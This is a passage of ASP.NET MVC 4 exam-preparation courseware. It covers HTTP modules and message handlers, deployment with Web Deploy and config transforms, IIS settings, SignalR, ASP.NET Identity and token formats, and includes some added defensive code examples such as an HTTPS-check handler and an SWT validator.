of the one residing on the origin server. If the Request-URI does
not point to an existing resource, and that URI is capable of
being defined as a new resource by the requesting user agent,
the origin server can create the resource with that URI
So PUT can be used to insert or update and the server should
respond with either 201 (Created) or 200 (OK) or 204 (No
content)
Method Definitions
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
14. 4
HTTP and REST
Designing the URIs
Choose common sense URIs so developers can quickly
work out how to access any resource and your service
becomes almost self-documenting
Design your service API as if you were designing the URLs for a
web site i.e. make them logical enough that an end user could
work out how to use them if shown a few examples
Task | HTTP Method | Relative URI
Retrieve all entities | GET | /api/orders
Retrieve single entity | GET | /api/orders/id
Retrieve by custom | GET | /api/orders?category=category
Create new entity | POST | /api/orders
Update entity | PUT | /api/orders/id
Remove entity | DELETE | /api/orders/id
15. 1
Module 15
Handling Requests in ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Handling Requests in ASP.NET MVC 4 Web Applications
15. 2
Contents
Exam Topic: Design and implement a Web Socket strategy
Read and write string and binary data asynchronously (long-running data transfers)
Choose a connection loss strategy
Decide a strategy for when to use Web Sockets
Exam Topic: Design HTTP modules and handlers
Implement synchronous and asynchronous modules and handlers
Choose between modules and handlers in IIS
Exam Topic: Control application behavior by using MVC extensibility points
Control application behavior by using action results, viewengines, model
binders, and route handlers
From the 20480 HTML5 course review the following
20480.13.Web.Sockets
Lab
Do NOT use the pre-release version of SignalR as described in
the lab, use the most recent version
HTTP Modules
15. 3
Implementing
HTTP handlers only process requests for file extensions
they are registered for; if you want to process all
requests, use an HTTP module instead
Create a class that implements IHttpModule
public class MyModule : IHttpModule
Implement Init method and add handlers for any events you
want to intercept
public void Init(HttpApplication a)
{
    this.app = a; // app is a private HttpApplication field of the module
    this.app.BeginRequest += LogAllRequestsMethod;
}
HTTP Modules
15. 4
Configuring
HTTP module must be registered in .config
For IIS 6.0 or IIS 7.0 in Classic mode
<system.web>
  <httpModules>
    <add name="MyMod" type="MyNamespace.MyModule" />
  </httpModules>
</system.web>
For IIS 7.0 in Integrated mode
<system.webServer>
  <modules>
    <add name="MyMod" type="MyNamespace.MyModule"
      preCondition="managedHandler"/>
  </modules>
</system.webServer>
The precondition causes the module to be invoked only for
requests to the ASP.NET application resources, such as .aspx
files or managed handlers (excludes static files like .htm)
How to: Configure the <system.webServer> Section for IIS 7.0
http://msdn.microsoft.com/en-us/library/bb763179.aspx
15. 5
HTTP Modules
Ordering
The order in which modules are processed is defined in the .config file
Order of events (sequential)
BeginRequest
AuthenticateRequest
AuthorizeRequest
ResolveRequestCache
AcquireRequestState
PreRequestHandlerExecute
PostRequestHandlerExecute
ReleaseRequestState
UpdateRequestCache
EndRequest
Order of events (non-deterministic)
PreSendRequestHeaders
PreSendRequestContent
Error
HTTP Modules
15. 6
HTTP Message Handlers
A message handler is a class that receives an HTTP
request and returns an HTTP response
Typically, a series of message handlers are chained together, so
they act more like HTTP modules than HTTP handlers!
If a delegating handler creates the response without calling
base.SendAsync, the request skips the rest of the pipeline
This can be useful for a handler that validates the request
(creating an error response)
HTTP Message Handlers
http://www.asp.net/web-api/overview/working-with-http/http-message-handlers
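A validating handler of the kind described above, as an added example that is not part of the original courseware: it answers plain-HTTP requests with 403 itself and never calls base.SendAsync, so the rest of the pipeline does not run. RequireHttpsHandler, StubInnerHandler and the localhost URLs are assumptions; the stub stands in for the rest of the pipeline so the program runs as a console application.

```csharp
using System;
using System.Net;
using System.Net.Http;
using System.Threading;
using System.Threading.Tasks;

// Rejects any request that did not arrive over HTTPS.
public class RequireHttpsHandler : DelegatingHandler
{
    protected override Task<HttpResponseMessage> SendAsync(
        HttpRequestMessage request, CancellationToken cancellationToken)
    {
        if (request.RequestUri.Scheme != Uri.UriSchemeHttps)
        {
            // Create the error response here; base.SendAsync is not called,
            // so no later handler or controller sees the request.
            var forbidden = new HttpResponseMessage(HttpStatusCode.Forbidden)
            {
                RequestMessage = request,
                ReasonPhrase = "HTTPS Required"
            };
            return Task.FromResult(forbidden);
        }
        return base.SendAsync(request, cancellationToken);
    }
}

// Stand-in for the rest of the pipeline; counts how often it is reached.
public class StubInnerHandler : HttpMessageHandler
{
    public int Calls;

    protected override Task<HttpResponseMessage> SendAsync(
        HttpRequestMessage request, CancellationToken cancellationToken)
    {
        Calls++;
        var ok = new HttpResponseMessage(HttpStatusCode.OK)
        {
            RequestMessage = request
        };
        return Task.FromResult(ok);
    }
}

static class Program
{
    static void Main()
    {
        var inner = new StubInnerHandler();
        var handler = new RequireHttpsHandler { InnerHandler = inner };

        using (var invoker = new HttpMessageInvoker(handler))
        {
            // Constructed sample requests.
            string[] urls =
            {
                "http://localhost/api/orders",
                "https://localhost/api/orders"
            };
            foreach (string url in urls)
            {
                var request = new HttpRequestMessage(HttpMethod.Get, url);
                var response = invoker
                    .SendAsync(request, CancellationToken.None).Result;
                Console.WriteLine("{0} -> {1} (inner handler reached {2} time(s))",
                    url, (int)response.StatusCode, inner.Calls);
            }
        }
    }
}
```

In a Web API project the handler is registered with config.MessageHandlers.Add(new RequireHttpsHandler()). Behind a TLS-terminating load balancer the scheme seen here is http, so the check would have to use the forwarded protocol instead.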
15. 7
HTTP Modules
HTTP Message Handlers Example
using System;
using System.Linq;
using System.Net.Http;
using System.Threading;
using System.Threading.Tasks;

// for clients that cannot send certain HTTP request types,
// such as PUT or DELETE
public class MethodOverrideHandler : DelegatingHandler
{
    readonly string[] _methods = { "DELETE", "HEAD", "PUT" };
    const string _header = "X-HTTP-Method-Override";

    protected override Task<HttpResponseMessage> SendAsync(
        HttpRequestMessage request, CancellationToken cancellationToken)
    {
        // Only a POST is rewritten, and only to a method in _methods
        if (request.Method == HttpMethod.Post && request.Headers.Contains(_header))
        {
            var method = request.Headers.GetValues(_header).FirstOrDefault();
            if (_methods.Contains(method, StringComparer.InvariantCultureIgnoreCase))
            {
                request.Method = new HttpMethod(method);
            }
        }
        var response = base.SendAsync(request, cancellationToken);
        return response;
    }
}
Extending MVC
15. 8
Interfaces and Classes
Interfaces and classes
IActionFilter: OnActionExecuting, OnActionExecuted methods
IController (Controller): Execute method
IRouteHandler (MvcRouteHandler, PageRouteHandler):
GetHttpHandler method
Use RouteTable.Routes.Add and pass in the instance of Route
or RouteBase instead of using MapRoute
IRouteConstraint (HttpMethodConstraint): Match method
16. 1
Module 16
Deploying ASP.NET MVC 4
Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Deploying ASP.NET MVC 4 Web Applications
16. 2
Contents
Topic
Slide
Web Deploy
ASP.NET Command Line Tools
Managing a Web AppDomain
Web.config Transformations
11
IIS
13
Common Ports
16
Exam Topic: Design a distributed application
Design a hybrid application (on premise vs. off premise, including Windows Azure)
Plan for session management in a distributed environment
Plan web farms
Web Deploy
16. 3
Overview
For any question about deployment tools, the answer is
almost always "use Web Deploy" because
It works securely
It is powerful and flexible by changing the web publish pipeline
You can install SSL certificates using a custom target
Only choose to use FTP, XCopy, VPN, SSH, and so on if
you have a very good reason
Web Deploy
16. 4
Packages
IIS Settings
Application Pool
Authentication method
Error Handling
Deploy Database Scripts
Production Settings
Release / Debugging
Connection Strings
Capable of Custom Extensions
Security Certificates
Windows Registry Settings
Assemblies in Global Assembly Cache (GAC)
16. 5
Web Deploy
Publishing Pipeline
[Diagram: the publishing pipeline runs through the stages Build, Collect, Transform, Web Deploy, and Package / Publish. Steps shown under the stages: Build; Collect binary and .pdb files; Collect references; Collect content; Transform web.config; Exclude files; Precompile; Collect GAC, COM, Registry settings; Collect IIS settings; Collect SSL Certificates; Create SQL scripts; Create manifest; Create package or publish; Custom extensions]
16. 6
Web Deploy
Importing Package into IIS
[Diagram: Web Deploy takes Package.zip and Parameters.xml as input. Providers shown: IIS Provider, Database Provider, Web Content Provider, Other Providers, Your custom Provider. Targets shown: IIS, Database, Web content, COM, GAC, Other, Custom Asset]
ASP.NET Command Line Tools
16. 7
ASP.NET IIS Registration Tool
aspnet_regiis.exe: ASP.NET/IIS configuration
Can be used to customize script maps
-lv: list status and paths of all versions of ASP.NET installed
-i: installs ASP.NET
-u: uninstalls ASP.NET; -ua: uninstalls all versions of ASP.NET
-pef section webApplicationDirectory: encrypts section
-pdf section webApplicationDirectory: decrypts section
-pe section -pkm: encrypts section in Machine.config
-pd section -pkm: decrypts section in Machine.config
and many more!
ASP.NET Command Line Tools
16. 8
ASP.NET SQL Server Registration Tool
aspnet_regsql.exe
Application services: Membership (m), Role Manager (r), Profile
(p), Web Parts Personalization (c), Web Events (w)
-A all, -A p, -A mcw: add service(s)
-R all, -R p, -R mcw: remove service(s)
SQL cache dependency: SQL Server 7.0 or later
-d <database> -ed/-dd: enable/disable database
-t <table> -et/-dt: enable/disable table
Session state (uses tempdb by default)
-d <database> -ssadd: adds support
-d <database> -ssremove: removes support
Managing a Web AppDomain
16. 9
Taking a Web Project Offline
To take a web project temporarily offline
Create a file named app_offline.htm in the root of a web site
The AppDomain will be unloaded and the contents of the static
file displayed instead of any response
Warning! Your site will return 503 Server Unavailable
Warning! Versions of Internet Explorer older than 8.0 give a
missing file error with small app_offline.htm files, so add about
a screen full of HTML comments to make it big enough (it must
be more than 512 bytes)
You can also use an entry in .config
This is what the WSAT tool does to take an application offline
<httpRuntime enable="false" />
Managing a Web AppDomain
16. 10
What Causes a Web Site to Restart?
Changes to
Machine.config
Web.config(s)
Global.asax
Contents of /bin
Directory is renamed
Excessive recompilations for a page when using
dynamically-recompiled web sites (defaults to 15)
Changes to Code Access Security (CAS) policy files
Web.config Transformations
16. 11
Changing and Removing Attributes
Web.config
<connectionStrings>
  <add name="MyDB"
       connectionString="Data Source=TestServer;..." />
</connectionStrings>
<system.web>
  <compilation debug="true" />
</system.web>
Web.Release.config
<connectionStrings>
  <add name="MyDB"
       connectionString="Data Source=ProductServer;..."
       xdt:Transform="SetAttributes" xdt:Locator="Match(name)" />
</connectionStrings>
<system.web>
  <compilation xdt:Transform="RemoveAttributes(debug)" />
</system.web>
Web.config Transformations
16. 12
Replacing Elements
Web.config
<customErrors defaultRedirect="Error.aspx"
              mode="RemoteOnly">
  <error statusCode="500" redirect="ServerError.htm" />
</customErrors>
Web.Debug.config
<customErrors defaultRedirect="DetailedError.aspx"
              mode="Off" xdt:Transform="Replace">
  <error statusCode="500" redirect="InternalError.htm" />
</customErrors>
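The two transformation slides change settings that matter in production: debug compilation, the customErrors mode, and the database the connection string points at. The following is an added example, not courseware code, of a post-transform check that reads the resulting Web.config and reports any of those settings left in their development state. ConfigAudit is a hypothetical name, and the sample document in Main is constructed.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Xml.Linq;

// Added example; ConfigAudit is a hypothetical name, not part of ASP.NET.
public static class ConfigAudit
{
    // Returns one finding per development setting found in the config.
    public static List<string> Check(XDocument config)
    {
        var findings = new List<string>();
        var web = config.Root == null ? null : config.Root.Element("system.web");

        // RemoveAttributes(debug) in Web.Release.config should have removed this.
        var compilation = web == null ? null : web.Element("compilation");
        var debug = compilation == null ? null : (string)compilation.Attribute("debug");
        if (string.Equals(debug, "true", StringComparison.OrdinalIgnoreCase))
            findings.Add("compilation debug=\"true\" survived the transform");

        // mode="Off" sends detailed error pages to every client, local or remote.
        var errors = web == null ? null : web.Element("customErrors");
        var mode = errors == null ? null : (string)errors.Attribute("mode");
        if (string.Equals(mode, "Off", StringComparison.OrdinalIgnoreCase))
            findings.Add("customErrors mode=\"Off\" exposes detailed errors");

        // SetAttributes + Match(name) should have replaced the test data source.
        foreach (var cs in config.Descendants("connectionStrings").Elements("add"))
        {
            var value = (string)cs.Attribute("connectionString") ?? "";
            if (value.IndexOf("TestServer", StringComparison.OrdinalIgnoreCase) >= 0)
                findings.Add("connection string '" + (string)cs.Attribute("name")
                             + "' still points at TestServer");
        }
        return findings;
    }

    public static void Main()
    {
        // Constructed sample: a Web.config that was published without its Release transform.
        var untransformed = XDocument.Parse(@"<configuration>
  <connectionStrings>
    <add name='MyDB' connectionString='Data Source=TestServer;...' />
  </connectionStrings>
  <system.web>
    <compilation debug='true' />
    <customErrors mode='Off' />
  </system.web>
</configuration>");
        foreach (var finding in Check(untransformed))
            Console.WriteLine(finding);
    }
}
```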
16. 13
IIS
Web Farms and Web Gardens
A web farm is when you have multiple physical servers
A web garden is when you have multiple processes in
an application pool
16. 14
IIS
ASP.NET Integration with IIS 7
IIS 7 supports both the old and the new modes
Can be used side by side on the same server in different
application pools
Classic
Integration
ASP.NET Integration with IIS 7
http://learn.iis.net/page.aspx/243/aspnet-integration-with-iis/
16. 15
IIS
Migrating
ASP.NET operates in Integrated mode by default
Because of the configuration unification, some applications may
require migration to operate properly in Integrated mode
The following configurations cause a migration error
<httpModules>: ASP.NET modules must be specified with native
modules in the unified <system.webServer>/<modules>
<httpHandlers>: ASP.NET handler mappings must be specified in
the unified <system.webServer>/<handlers>
This replaces both the <httpHandlers> configuration and the
scriptmaps configuration, both of which previously had to be
configured to set up an ASP.NET handler mapping
<identity impersonate="true" />
If your application does not rely on impersonating the requesting user in the
BeginRequest and AuthenticateRequest stages (the only stages where impersonation is
not possible in Integrated mode), ignore this error by adding the following to your
application's web.config: <validation validateIntegratedModeConfiguration="false" />
16. 16
Common Ports
Port  Description
21    FTP data transfer
22    Secure Shell (SSH): used for secure logins, file transfers (scp, sftp) and port forwarding
23    Telnet protocol: unencrypted text communications
25    Simple Mail Transfer Protocol (SMTP): used for e-mail routing between mail servers
53    Domain Name System (DNS)
79    Finger protocol
80    Hypertext Transfer Protocol (HTTP)
88    Kerberos: authentication system
443   Hypertext Transfer Protocol over TLS/SSL (HTTPS)
666   Doom, first online first-person shooter
List of TCP and UDP port numbers
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
A. 1
Appendix A
What's New in Visual Studio 2013
and Updated Exam
What's New in Visual Studio 2013
A. 2
Contents
Topic (Slide)
SignalR (4)
Filters
Browser Testing (10)
ASP.NET Identity (11)
Token Formats (17)
Azure Caching (18)
Exam Topics: Design and implement a Web Socket strategy
Implement SignalR
Exam Topics: Design and implement MVC controllers and actions
Apply authentication filters
Specify an override filter
What's New in Visual Studio 2013
A. 3
Contents
Exam Topics: Test a web application
Create and run web tests (including using Browser Link)
Debug a web application in multiple browsers and mobile emulators
Exam Topics: Debug a Windows Azure application
Debug a Windows Azure application by using remote debugging
Interact directly with remote Windows Azure websites using Server Explorer
Exam Topics: Configure authentication
Configure ASP.NET Identity
Exam Topics: Design and implement claims-based authentication
across federated identity stores
Handle token formats (for example, oAuth, OpenID, Microsoft Account,
Google, Twitter, and Facebook) for SAML and SWT tokens
Exam Topics: Design a caching strategy
Implement Azure caching
SignalR
A. 4
What Is SignalR 2.0?
Incredibly simple real-time web for .NET
Ability to have your server-side code push content to the
connected clients as it happens, in real-time
SignalR will use WebSockets under the covers when it's
available, and gracefully fall back to other technologies when it
isn't, while your application code stays the same
Install it with NuGet
Install-Package Microsoft.AspNet.SignalR
Install a sample application
Install-Package Microsoft.AspNet.SignalR.Sample
Learn About ASP.NET SignalR
http://www.asp.net/signalr
A. 5
SignalR
Communication
SignalR provides a simple
API for creating server-to-client remote procedure
calls (RPC) that call
JavaScript functions in
client browsers from
server-side .NET code
SignalR
A. 6
Transport Selection Process
Steps that SignalR uses to decide which transport to use
If the browser is IE8 or earlier, Long Polling is used
If JSONP is configured (that is, the jsonp parameter is set to
true when the connection is started), Long Polling is used
If a cross-domain connection is being made then WebSocket will
be used if the client supports CORS and both support WebSocket
If JSONP is not configured and the connection is not cross-domain,
WebSocket will be used if both the client and server support it
If either the client or server do not support WebSocket, Server
Sent Events is used if it is available
If Server Sent Events is not available, Forever Frame is
attempted
If Forever Frame fails, Long Polling is used
A. 7
SignalR
Monitoring Transports
You can determine what transport your application is
using by enabling logging on your hub
$.connection.hub.logging = true;
You can request transport preferences
connection.start({ transport: ['webSockets','longPolling'] });
Tutorial: Getting Started with SignalR 2.0 and MVC 5
http://www.asp.net/signalr/overview/signalr-20/getting-started-with-signalr-20/tutorial-getting-started-with-signalr-20-and-mvc-5
A. 8
Filters
Authentication Filters
Applied prior to any Authorization filters
To create a custom authentication filter, implement two methods
using System.Web.Mvc;
using System.Web.Mvc.Filters;

public class BasicAuthAttribute : ActionFilterAttribute, IAuthenticationFilter
{
    // executed first and can be used to perform any needed authentication
    public void OnAuthentication(AuthenticationContext filterContext)
    {
        // (authentication logic goes here)
    }

    public void OnAuthenticationChallenge(
        AuthenticationChallengeContext filterContext)
    {
        // restrict access based upon the authenticated user's principal
        var user = filterContext.HttpContext.User;
        if (user == null || !user.Identity.IsAuthenticated)
        {
            filterContext.Result = new HttpUnauthorizedResult();
        }
    }
}
ASP.NET MVC 5 Authentication Filters
http://visualstudiomagazine.com/articles/2013/08/28/asp_net-authentication-filters.aspx
Filters
A. 9
Overriding Filters
We can exclude a specific action method or controller
from the global filter or controller level filter
OverrideAuthenticationAttribute,
OverrideAuthorizationAttribute, OverrideActionFiltersAttribute,
OverrideResultAttribute, OverrideExceptionAttribute
[Authorize(Users = "Admin")]
public class HomeController : Controller
{
    public ActionResult Index() {
        ViewBag.Message = "Welcome to ASP.NET MVC!";
        return View();
    }

    // the controller-level [Authorize] filter does not apply to this action
    [OverrideAuthorization]
    public ActionResult About() {
        return View();
    }
}
Filter Overrides in ASP.Net MVC 5
http://www.c-sharpcorner.com/UploadFile/ff2f08/filter-overrides-in-Asp-Net-mvc-5/
Browser Testing
A. 10
Browser Link
A communication channel between the development
environment and one or more web browsers
Refresh your web application in several browsers at once, which
is useful for cross-browser testing
Use Ctrl to select multiple browsers for testing
To enable for static files
<system.webServer> <handlers>
<add name="Browser Link for HTML" path="*.html" verb="*"
type="System.Web.StaticFileHandler, System.Web,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
resourceType="File" preCondition="integratedMode" />
Using Browser Link in Visual Studio 2013
http://www.asp.net/visual-studio/overview/2013/using-browser-link
ASP.NET Identity
A. 11
History of Identity Management
ASP.NET Membership
Designed to solve site membership requirements that were
common in 2005
ASP.NET Simple Membership
Doesn't work well with existing ASP.NET Membership providers
ASP.NET Universal Providers
Built on EF Code First
The assumption that users will log in by entering a user
name and password that they have registered in your
own application is no longer valid
The ASP.NET Identity System
http://www.asp.net/identity
ASP.NET Identity
A. 12
Modernizing Identity Management
A modern membership system must enable redirection-based
log-ins to authentication providers such as
Facebook, Twitter, and others
ASP.NET Identity uses Entity Framework Code First to
implement all of its persistence mechanism
You can easily add social log-ins such as Microsoft Account,
Facebook, Twitter, Google, and others to your application, and
store the user-specific data in your application
ASP.NET authentication is now based on OWIN
middleware that can be used on any OWIN-based host
Introduction to ASP.NET Identity
http://www.asp.net/identity/overview/getting-started/introduction-to-aspnet-identity
ASP.NET Identity
A. 13
Registering
When the user clicks the Register
button, the Register action of the
Account controller creates the user by
calling the ASP.NET Identity API
// POST: /Account/Register
[HttpPost]
[AllowAnonymous]
[ValidateAntiForgeryToken]
public async Task<ActionResult> Register(RegisterViewModel model)
{
    var user = new ApplicationUser() { UserName = model.UserName };
    var result = await UserManager.CreateAsync(user, model.Password);
    if (result.Succeeded)
    {
        await SignInAsync(user, isPersistent: false);
        return RedirectToAction("Index", "Home");
    }
    // user creation failed: redisplay the form
    return View(model);
}
ASP.NET Identity
A. 14
Signing In
If the user was successfully created, she is logged in by
the SignInAsync method
private async Task SignInAsync(ApplicationUser user, bool isPersistent)
{
AuthenticationManager.SignOut(DefaultAuthenticationTypes.ExternalCookie);
var identity = await UserManager.CreateIdentityAsync(
user, DefaultAuthenticationTypes.ApplicationCookie);
AuthenticationManager.SignIn(new AuthenticationProperties()
{ IsPersistent = isPersistent }, identity);
}
ASP.NET Identity and OWIN Cookie Authentication are claims-based
systems, so the framework requires the app to generate a
ClaimsIdentity for the user using CreateIdentityAsync
The code above signs in the user by using the
AuthenticationManager from OWIN and calling SignIn and
passing in the ClaimsIdentity
ASP.NET Identity
A. 15
Components
Packages in green make up the ASP.NET Identity system
All the other packages are dependencies which are needed to
use the ASP.NET Identity system in ASP.NET applications
ASP.NET Identity
A. 16
Tutorial
MVC 5 with Google and Facebook authentication
This tutorial shows you how to build an ASP.NET MVC 5 web
application that enables users to log in using OAuth 2.0 or
OpenID with credentials from an external authentication
provider, such as Facebook, Twitter, Microsoft, or Google
For simplicity, this tutorial focuses on working with credentials
from Facebook and Google
Enabling these credentials in your web sites provides a
significant advantage because millions of users already have
accounts with these external providers
These users may be more inclined to sign up for your site if they
do not have to create and remember a new set of credentials
The tutorial also shows how to add profile data for the user, and
how to use the Membership API to add roles
Code! MVC 5 App with Facebook, Twitter, LinkedIn and Google OAuth2 Sign-on
http://www.asp.net/mvc/tutorials/mvc-5/create-an-aspnet-mvc-5-app-with-facebook-and-google-oauth2-and-openid-sign-on
Token Formats
A. 17
Supported in ACS
ACS can issue security tokens in the following formats
Security Assertion Markup Language (SAML) 1.1 and 2.0
<assertion id="_4fe09cda-cad9-49dd-b493-93494e1ae4f9"
issueinstant="2012-09-18T20:42:11.626Z"
version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
<issuer>https://test05.accesscontrol.windows.net/</issuer>
Simple Web Token (SWT)
Audience=http%3a%2f%2flocalhost%2fmyservice&ExpiresOn=1255913549
Issuer=https%3a%2f%2fmyservice.accesscontrol.windows.net%2f&role
=Admin%2cUser&role=Admin%2cUser&&HMACSHA256=sT7Hr9z%2b3t1oDFLpq5
GOToVsu6Dyxpq7hHsSAznmwnI%3d
JSON Web token (JWT)
Token Formats Supported in ACS
http://msdn.microsoft.com/en-us/library/gg185950.aspx
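An added example, not from the courseware or the ACS documentation, of what a relying party should check before trusting the role values in an SWT like the one above: the HMACSHA256 signature over everything that precedes it, then the issuer, audience and expiry. SwtValidator and its parameter names are hypothetical, and key is assumed to be the raw bytes of the symmetric signing key shared with the issuer.

```csharp
using System;
using System.Linq;
using System.Net;
using System.Security.Cryptography;
using System.Text;

// Added example (hypothetical names). Validate returns the verified pairs or throws.
public static class SwtValidator
{
    const string SigParam = "&HMACSHA256=";
    static readonly DateTime Epoch = new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);

    public static ILookup<string, string> Validate(string token, byte[] key,
        string expectedIssuer, string expectedAudience, DateTime utcNow)
    {
        int sigAt = token.LastIndexOf(SigParam, StringComparison.Ordinal);
        if (sigAt < 0) throw new CryptographicException("HMACSHA256 parameter missing");
        // The HMAC covers every character that precedes "&HMACSHA256=".
        string signedPart = token.Substring(0, sigAt);
        string sigText = WebUtility.UrlDecode(token.Substring(sigAt + SigParam.Length));
        byte[] presented;
        try { presented = Convert.FromBase64String(sigText); }
        catch (FormatException) { throw new CryptographicException("Signature is not base64"); }
        byte[] expected;
        using (var hmac = new HMACSHA256(key))
            expected = hmac.ComputeHash(Encoding.UTF8.GetBytes(signedPart));
        if (!FixedTimeEquals(expected, presented)) throw new CryptographicException("Signature mismatch");
        // Read the name/value pairs only after the signature has been verified.
        var claims = signedPart.Split(new[] { '&' }, StringSplitOptions.RemoveEmptyEntries)
            .Select(p => p.Split(new[] { '=' }, 2))
            .Where(kv => kv.Length == 2)
            .ToLookup(kv => WebUtility.UrlDecode(kv[0]), kv => WebUtility.UrlDecode(kv[1]));
        if (Require(claims, "Issuer") != expectedIssuer) throw new CryptographicException("Unexpected issuer");
        if (Require(claims, "Audience") != expectedAudience) throw new CryptographicException("Wrong audience");
        long expires = long.Parse(Require(claims, "ExpiresOn")); // seconds since 1970-01-01 UTC
        if (Epoch.AddSeconds(expires) <= utcNow) throw new CryptographicException("Token has expired");
        return claims;
    }

    // Issuer, Audience and ExpiresOn must each appear exactly once.
    static string Require(ILookup<string, string> claims, string name)
    {
        if (claims[name].Count() != 1) throw new CryptographicException(name + " missing or repeated");
        return claims[name].First();
    }

    // Compares without stopping at the first differing byte.
    static bool FixedTimeEquals(byte[] a, byte[] b)
    {
        int diff = a.Length ^ b.Length;
        for (int i = 0; i < a.Length && i < b.Length; i++) diff |= a[i] ^ b[i];
        return diff == 0;
    }
}
```

Pass DateTime.UtcNow for utcNow in production; taking it as a parameter keeps the expiry check testable.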
Microsoft Azure Caching
A. 18
Implementing
Build highly responsive applications using a distributed
cache that scales independently from your application
using Microsoft.ApplicationServer.Caching;
DataCache cache = new DataCache("default");
// Add the string "value" to the cache, keyed by "item"
cache.Add("item", "value", TimeSpan.FromMinutes(30));
DataCacheItem item = cache.GetCacheItem("item");
TimeSpan timeRemaining = item.Timeout;
Cache
http://azure.microsoft.com/en-us/documentation/services/cache/
How to Use Azure Cache Service
http://azure.microsoft.com/en-us/documentation/articles/cache-dotnet-how-to-use-service/